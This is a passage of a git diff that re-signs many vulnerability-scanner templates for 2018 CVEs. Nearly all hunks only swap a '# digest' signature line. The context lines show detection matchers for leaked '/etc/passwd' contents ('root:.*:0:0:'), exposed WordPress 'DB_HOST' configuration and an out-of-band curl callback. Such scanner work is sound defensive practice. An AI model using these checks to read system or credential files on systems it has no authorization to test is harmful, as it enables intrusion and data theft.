a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 64c613c5f1..ba665dc12c 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009b7f5235e1ae5bff354794e576ea1f86c12d0cc20316702931fc2e57952782e6022100f131de78d471ee39035c0fd92637a5e5c7dc6bc643dc94374cd9ea76c7ac9f0f:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220501c8368a496f3f709b23d0f5e06262ca96b02cf07bbb37adb8ca3ccc36e80f40220054e03b1f4f8826a3727cbaf2a4974f8a277682525f46b169e518877f03fb20c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index 224d6aae80..3085893c0a 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c0774c7bfa12725c4122a2b53ca14d872de28b5a490151bbf64f91450f4bb807022100af39469648b9d81fbc2e241363be3ac9a75251a0b430e7e46b4daf0417ca37bf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100afc262c58c8c4057c9fd29a7b7c7e6da9df4227536eee6cd2a60b66f8c88143f0220308d95e14e39e0a799e36351a76b2b5a79fed58c42fe12d3b9010f6a250adab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-2392.yaml b/http/cves/2018/CVE-2018-2392.yaml index 89e195fa2d..5c119a28d3 100644 --- a/http/cves/2018/CVE-2018-2392.yaml +++ b/http/cves/2018/CVE-2018-2392.yaml @@ -97,4 +97,4 @@ http: - 200 # file name - /etc/passwd -# digest: 4a0a00473045022023c1d042c822d5e7cc8a694f220257d38ec89c34c01f547b19d4dc3c661d2520022100a70baaf3c4a67da5a9c0b6d4295a2862fd6bd1a5b795c9cefb0b03f357449664:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022007f81404dc4cea9b922fe3908cba52871cf5a10bb2c97072e43ba62b2a8f8403022042b97ffd113f1eeb8703fece9f6de043a67c55e3f26a764b609c237cd24e18a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index f1a9231b29..cbda4175a4 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -50,5 +50,4 @@ http: - '' - 'Missing translation key' condition: and - -# digest: 4a0a0047304502200e4dcf3804d1530ceda7eee2a724f9f3641ae0ec25304ec38231898f4538833f022100c2b72323faaaade2467c17da374c657df7105671859eadc1859846d72369a725:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c2218f56f3e6569cabc3901b1bce3b7b5e43ec4ca5602e3d18913932ca6c238d022100e73e04f4e7074cd3a9f8d358f61ecf0d17cc6a48fa1d5cbf927d0afc0f863441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index 1f90b2f677..9715e02f9c 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220299773911eac5b4efcd91e412f8c759e4a05608fc448657900bd0ce2a12e21e902204bcf94965385c8431cfe07286a593f2d1bc8a84aff9490a9283c2bee98d11bff:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ae7d3583129566efdfd5712d5b16aad4f4ec182f5ff3855262b6e0f33458008a022100ad0a46346639921413b199b923cb023bde41b317feb174d9d909835ac72564d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index 5836895078..b4445dae4e 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -52,5 +52,4 @@ http: - '' - 'Variables.cs_imagedir' condition: and - -# digest: 4a0a004730450220008527a50217211f49a0edeaf9a7a2cc5c472a7df63b0c4f5c2376492fbbd381022100e37464fa2c23088de3de1aa1db657c9bf6fb146cd7d7a3a78c6334ab025c5ede:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f6762b271775ebf2e62821e25f874162037ee3ec433fe46d07abae34163be165022100bef563ed99367a99e70abd34e9348c1ef31e246c85231cf7fb83ae8179acf705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml index 2586f37767..71e455bfb5 100644 --- a/http/cves/2018/CVE-2018-3714.yaml +++ b/http/cves/2018/CVE-2018-3714.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210094e99a3feb5e684c89bf5261d350c42c6209076e4e09a9fd80db9fe37e00e405022100d8a0079d40728aa506bf89cd2d86710fda06fceb32c70b3bca4afd335b2f8191:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220689b54576daa06f37c31cc8a19ae1796d8080fe21c5a53baa8b0691aaf34c391022053f42a219473a1de06d959285bb9cf633574bbefe923d7391f8e921a86bdd56c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml index ba81a56038..abf4b5faa0 100644 --- a/http/cves/2018/CVE-2018-3760.yaml +++ b/http/cves/2018/CVE-2018-3760.yaml @@ -54,5 +54,4 @@ http: - "/etc/passwd is no longer under a load path: (.*?)," internal: true part: body - -# digest: 4b0a00483046022100cc1a77f0c8163dad946805c5e1c7fb70438d29abb3f62850d714fea109fcacd50221008f6950df09ee4836bb10184809665366269423cb6d5e89a50e2b8c8173883df9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ad1553be9f1f56c5f9480183f8c1d4b54714d3a6d427d302ce56a3f7cb44de47022047b0bfd1adfac568031d24f1d4da3176c5472af5ccb9aff0c70f5e17dbc3dfd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml index a7200fa704..da29fae080 100644 --- a/http/cves/2018/CVE-2018-3810.yaml +++ b/http/cves/2018/CVE-2018-3810.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206051d65ef27a79cdcbbcf6ba908b9b985b20514798c1ec00b67ab8394886cfc802203a3539d884ea44afaf3f86d3167b44a6c7bb2387c78347a19464264f41289577:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100aab6489dae5ed8213aba5fc806577be853e3cfb3239952a0b6dfa1c39b67245f022100ed451425cf5c79e209518cbcc3e72300894c81e7f786d35b54c0b97916365c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 7a4ff23693..cfe3f1bdcc 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a173e4c73be07eb34fd191a039b20af3c58e60f94e75a95eed6be7df20de20d8022024b33578c0d489294d450ca009599dcb727ceb99fedea5c50241b5a3a5b07416:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206ea62a0361df5fead0da8ba8b6685a3383c98295145197e774a41160827c2b0b022048b4535b3dfc5b220c924a005fe0aab589fe510bed814245094767791bb6961a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index 2ce757029b..eb91d6bb08 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022033d4839bc025f0e62fe91404ce5a73fefd71885fb2bd1ef22da93ad505a9e5b802203aa0bb86b1039727f90c1dec805e1d5f5e1e96ef4231f186378c75727e1489f1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dabf10996e0f88b42ebe0180f7c2c47c4bdfc1d3a9eaf563b72805bf34e29940022100e34e021af278e8ec98a1a9f90c04e0dbd600604500bad883e587175dfe68cf81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml index c32207f741..e0e2d97538 100644 --- a/http/cves/2018/CVE-2018-5316.yaml +++ b/http/cves/2018/CVE-2018-5316.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220641669157a217014641c74d5ce021a7028578991cdc5be356a2535afe5feff900221008b3ff689050af5fb95a85cfe7d50279c70036fe85c513fd36193a4f296b9a7f1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f09faf784fd475f364209105ee8ffe87f081d650220cf5341af6a8cc486447f602200d75c5505eae0208a2fb8ac7c576e880b2b18132ca23fcc9a189292b2b094a2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index 833352d602..d5cd3a16c3 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ba8fe2cf1782f40cacee64069a477451b0d0f36537855ffff0ca82341afdb6680221009f735eba1e8e2a3266f11904d2d1b40ddeff4cf669e1bb300e2fd972a789bed4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210084a6350bb6e9db63059b238a82e1cf8300ee8f790dadefc4301fa3b493b3f007022100b1000b9fe484d9210acce8f4d1ebd788531b14d5fb43da28b3a52a50137caf70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index 7076dd5b14..c72bcd9bfc 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220734c1dbfcd674ded9e9e78b637dbc7196def1e1361a1ab313e8cc73e0473df730221009f8c2e806071fed8586c6a5d4044f712e067461c5bc23e4efdf4adab1a47d7a4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c0c695a6fa5c44e02bcebe74b7e83385e339cde417be61038a475f80cff414f502202557897bf8adf761f6d1966f36bf6c8ae683ec1cec35caab7f8bb76e4ff46e79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 53e4d91f95..e05a13d9a8 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203ef3bd3ea0af5a3d167db16d44d87adbb3f9c84e4a8f5eebcc6c4924d1f23f7a02207ddfdd1c30d41d5bcb8621c171932426672bbb59d05119c413c1360b6858e15b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206b0ea80ea8e7850b5f95580c333a3392f43e60031bee71ee5bbb6a1abede24ad02202f7ce2e5ee7be556e315ddeca795ba9773815c49db4356b706a8fea36344c030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index 1964d8ddbf..b465a279ff 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205af3a592c090285a94f5b5a86ae82e133efcfa6def13651bb67e6a77756f8d3f022100e5fbe324d7ce2c09c9d24c938332a0a70a7d6ac19ceebe0c9a126b46f42f2e65:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b41e8e4a4ba06bba2bf88d111b83104e752ded800a621dbf4820cceefe8e2ebd022100d59d052a80f01426581958683635239e980b342a58b9234376e673420c2f9d72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index ed54647fa7..57ac5e140f 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -50,5 +50,4 @@ http: part: interactsh_request words: - "User-Agent: curl" - -# digest: 4a0a00473045022100d9bf53a156beed1f5e602f29e657237cdee671da8138619b89150fd1dee0ac2302206d6994f394d2a6f65cfe968f677e76470e38a63dbafc5400302a5d3cd926dfeb:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220487352833a25a7205d849adcc8567a1a47f26acd05e141b2b88d0276b6948fc5022043a8a1f3adf7885aa236f32423e730d37c01cb7bb9dfdb68a35c4dbba6d87a4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 69236b5166..0088f29a54 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200458dc5b388cb65aa7105c3b4048aa0bf372e551b46547a3098ad210cf6132c7022100c20b64d277c5275c98beb1385a7626710cec00d227cc1ef4e233dbfce60e91b6:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207099941642d787ce0b61150f840b77c6287c73298210e61d81a4b1b071c759560220543a67753d961319cb7e2007a06fbec340a9bd13656e4b94280044fc2bbbf73e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index f822322103..f89801c96b 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -40,5 +40,4 @@ http: - '"message":' - '"trace":[' condition: and - -# digest: 490a0046304402205da57cc47f46777a9aa859233b20fa9988d0b6ffabd77bc37dd9c349fa01a61c022046623efd957b9a2c790ef34771fe45884e8652081f6b5372728e80d2ffcfbe90:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b553361717b4880d5a76ae3196f1f3e72e2b388252625306dd5fb9b37e37be51022100caf858356f7435406030a53adfb1575a95500f6e0072dd0a3dcb927ab7d8f9df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index 605260abb1..acb3347004 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -50,5 +50,4 @@ http: - 'status_code == 200' - 'contains(body, "PrintMonitor") && contains(header, "text/html")' condition: and - -# digest: 490a0046304402206f9712d17cb904b82f0a33e4c442e9e04eea9a26c0d8af74eabecd99776884fb022005c73c95f7716f55338e1fb3324ed81910700cee4b7adfef86346ab0ce304bf0:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203aa66dbc6209d005dc940cfeeb541893d5533677704a72f291d21fc3d5f8645a022042acb50a55d351ed5b1205ff3e7c5a01a3c57839c434da7589e1f5d7b7aa8eab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index 5fdf4400c2..64a3213dbc 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -47,5 +47,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4a0a00473045022100ec4c9916aed11b27d43dcac32fb67bb455335e647dccfe5c693a7440e606bc7302206dea6a81785d2fd3b2cd3c74e425c64ae9173e30dd3ca09e1f09e5077e8d0571:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022040e3d9c2e79c50ba4cc99ea23ad3243fcb48a76d8f231bce2f75c033eccd5c6c022100efa2c6a2cfc18fd307c05f44bee1dc59b26ea8d214761d30f58cb3a04ab754f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index 19c1db266a..2db46e6cb6 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -41,5 +41,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 4b0a00483046022100b6449ed9c8d3097d4af78776fd8494215971a62c22015ca2e162536b834c8f31022100d4e0486119616ba845b7feb6f42dc292333666ca21fe3f90a07b8e80da5b2e9d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022005eaebfd13aeeb1d34bb290f5ffa5ad42e15e1a7c8f9f08771809668e100101e0221008fdd95f8cdc8f7f3d401c8957c1312c777294d8fc9f8d05f8e8f800ba8f04621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index ac5487a631..f15388fa89 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -83,5 +83,4 @@ http: - '' internal: true part: body - -# digest: 4a0a00473045022100cf8fb140f40c1033568fd7a5c89c7560ce9f196779c2b3cd9ea51c694ef139b2022011f74c25f0e3e0bf1b10a9c3287aa31ac998a25e8e30fb6f30aa9ddffd4407cd:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220538b785349a6f8b2efde70e6722a17f8b671834f518846a94afc5cb02c5b80f10220665ecbcb971e7d69a769e89c9d4581f0087ecb10c5cce07a82535744db2847d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 38fd97ee9d..c7abec61dc 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bb966230f8f22428cc4e8573cf77b392bcf48f6de1fe1ae5b135443cccae7c2b02207729806627807bfb1b9efdcfc24e1d95878649bf20f1ef2ef09a4d7b6fa040cd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202ba7f65e3d611f2cbdab07eb95b4a40c191c128031308d69f188522700ec0db3022100f3bf078ee30dbb6499fafa5c89e1a5f7e4d41f09bb6fc578240d9dee0c8b3901:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index e785b751e3..2b9e956e58 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -47,5 +47,4 @@ http: - "phpmailer.php on line 10" - "Fatal error: Call to a menber function add_event_listener() on a non-object in" condition: and - -# digest: 4a0a00473045022100981784dad4b721d901844751b973b551019f07f3a13156eaf5ebf4a76bc491fd02205969aa223b50276101083890675614e5bc9fce217e46136a9b70f4ec05a398f5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d02b187a24fc64331ca2cb04f2c18f3a9f769b8a98afc47300108a77f8dd006d02210086b7c219b3c0d6c77bc56400ec179caec79374d58df60be74bead2b7ef369063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index 9362cc5fd2..f75d6fa328 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205d6c6708f13a62f64ffd54e6744281e2e0558af25e810e549f4740a6da03cce6022100cbe54213892e843bbf76895f07809242fb03cc80ecbfa4c7be3b268559c42388:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022048c7acce78096ccce8dfcec79bb4127fdd2a86304a7835357822083d34b2f57f0221008442e2ac36619adaea0ef797e6ccb5d14ba5596b5c62d7ebfd99ad955221c394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml index 707549d995..a648b66c35 100644 --- a/http/cves/2018/CVE-2018-7719.yaml +++ b/http/cves/2018/CVE-2018-7719.yaml @@ -42,5 +42,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 490a004630440220317f2d8008bc0767f777409790417b28c0f14a5ec0d1758fa80758185a515b300220322933f7dd6fe06ed3332e24f4f6d4e6c529b56b89666b148f25b8f7b5a9976b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022065cd8ebff8bf6b07379032167fe6332d3e3b8b902180909f6cce3592eda15fbe022100b05d052388545954053f5a7a94f364eac75f68bc50dbfa48eb686a77a2beeca4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index 570e45a912..b1b00c2128 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202b1d0b2e5ac12e11f579ed8a0d4811b0bfa546304736eb713569c50789d7190b0220792fe53467aa2fec9ea437c8354d3d93bd47b78bcdd4f915a88e70fd60a6468c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008a9ce0a954962a2421ef049497fa0bf9cc4944b344e7e905fe8f166959dd4a5d022047527bd18561df855520a4589aac254046014b6a358b373b8e5c8a30c9ec7eb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index d0458ec369..131fca9204 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e14fcba57e5dfa4a3d2bff96e0befd7b8206c617e56bea311b3f2e381c0ff68a02205aec6840d5e14a1d82ddb37e9ece1ed71ad95f48b5d6c0fc1b46770eaa5e0829:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100992f7a00c7812796f928d73ce209b88c2f6dd003041a74465223e7726c22da2702210089cda551b1ac9cb7aabb158225d26b3835ac1c145ec9016743b8dabb9f5472d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 5863d6d49e..eeae0b0c48 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200f53d0ebe250578f543d3758b36f05e043907db69de13169614828f634f1961e022013e831b63b9ac1bf9921d1cc60cbfc40431ea1c93d3cd7df8c1f9079ca59b311:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100903e884f747a183f824347c444326ea270806331e978a0eef5561a81a9e504b20220562f4017803fa898c1507a4342159d34152b343b1abd6a3ff44ad9d8fefd09dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index 9f2af199ae..1dcbe4ccf4 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -39,5 +39,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 4b0a00483046022100c0a64e026794cb94aa74772fabdd19fb4e541dc5bc9b52095c5ccc0d8bc6f99b022100d9fbd7dff334835cc7cc40dc4af5e43ff650a8e3a135aef47e5aa8e554173bfc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008f15b63c3265918e0f9d2914134e1e698f5dea47968c77e21aff84d7ea973976022066d5d654cb4aed75bcb7faf9390c1959f0a5261921e94368ee9e4ecf3f9662f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index 12ac801362..c8c09f7ce6 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220085ef920b8ad4468f4c6b03c7f6f6f45d77ab3510680766b7929ea5e63eb40bb022100817bb4959336e5fff13d128bdd4ffb2c3ec7ddfdffcf9052cab064a290018431:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201a6b5640c464ee3843fb1b992a1608bfca000faf0901db2bef90a4212e4b0e57022100e7b526b8a278d8e96d3a603ab3bd046a0234a35c5fa07a9f55dd996af5853b7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index 9e4a9546dc..c6529c45ee 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -43,5 +43,4 @@ http: - "DB_HOST" - "The base configurations of the WordPress" condition: and - -# digest: 490a004630440220291556404f8bc07a8020ed1af91ad80b15a70aada071bf58cb9d137d37a31eb50220701551da6fb003937abd4af1c044026521940728077a5ba20e95a1273f06bb8b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207c6702decdcd46a206182b670bbf2a19ff536b4f1843301e14667eb4c4aa68c20221009b517af27d6c9fab66f0f3b8358e76ddbe6e2588dcbbb72cda87c5f15eea1689:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml index 1a098deccd..4ad63a7618 100644 --- a/http/cves/2018/CVE-2018-9161.yaml +++ b/http/cves/2018/CVE-2018-9161.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220613622303d3ac5145ae1da667d81762df4f4568c9455917c9f1457e664a73e4b0220447fbb2c227ddd2d53721c1e52a1ea51b87349451218246d26965c2cf2ff3b8f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c67a5ce51509311563bec3bde93f629538b48dd5ed2fbdb0c82f89a3ee85501e022100e09ff57618a0941162a541c2aa459ada42cfd5331d5b1200b983791edea1c525:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index 1fabcd63aa..1b3e233cae 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a0d95d6fc975f8419c3181b6d769ce37c906633ebe0118cae07d682898f2215f022100a6b633164065a8e5d17b4ba27382ba4dde6aac4a3a0cc90d82a5c6cd71f7841b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cc1338decfc05863114c5f3c476da49e51cf9cd1f7e7926270988bd74e0d32d902202e32a8f8fdbc1a97bfab28606788f3486abd8ede06c57b4580d2078979ecf1cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index 49d94f48f5..4bbbb8d81e 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008392af8f942124a2a91faa1aea7553520da5a0291abd1542440264ce0d34490202203ca634d825fae79067d7ed06ab0bde4f5650e10a70fd39daaea731e231052712:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022060da3afdf543f7d927c308b7045b4fd64ab8a70df2ed0ec22aeff29e99c458bb02203f0473690face41ec99f1b612ef67cc245a1285e2a30b1c90e313f12f639c802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9995.yaml b/http/cves/2018/CVE-2018-9995.yaml index d91c1d7239..6cbc095ac2 100644 --- a/http/cves/2018/CVE-2018-9995.yaml +++ b/http/cves/2018/CVE-2018-9995.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210083a2bc3c016e78efd55ae3808340e9111714d02c08b6c650c27da129be88d9df0220266ed5f270d1c3b7c520dab5e0a12c6097a084adbf91943bcf53f26cfba9eebb:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200811ac09322081affc5e1bbee1c15ec63657b555fc674a2526d202fb0a3f7ebd0220174a9b38e269ab60baa04162d2403386e321bd5b4b41d2bdae86ab14d3f70cd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index aa9a4173de..a487eea6c4 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ 